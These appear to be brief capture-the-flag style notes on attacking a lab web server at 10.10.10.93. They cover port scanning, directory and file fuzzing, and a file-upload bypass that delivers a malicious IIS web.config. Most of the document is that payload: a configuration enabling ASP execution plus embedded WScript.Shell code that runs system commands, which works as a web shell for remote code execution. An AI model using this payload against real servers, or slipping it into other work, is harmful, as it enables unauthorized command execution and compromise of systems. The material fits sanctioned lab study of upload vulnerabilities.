rustscan -a 10.10.10.93 -r 0-65535 --ulimit 5000
nmap -sC -sV 10.10.10.93 -p 80
HTTP:80
HTTP:80 (Source-Code)
Directory Fuzzing
feroxbuster -u http://10.10.10.93 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -n
File Fuzzing
feroxbuster -u http://10.10.10.93 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x aspx -s 200 -n
Secure File Transfer: File Upload
Upload image file with .jpg extensions:
Other extensions:
RCE by uploading a web.config file: https://web.archive.org/web/20200808062615/https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/
Contents of web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>Simple Shell:
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping CHANGE_ME")
o = cmd.StdOut.Readall()
Response.write(o)
%>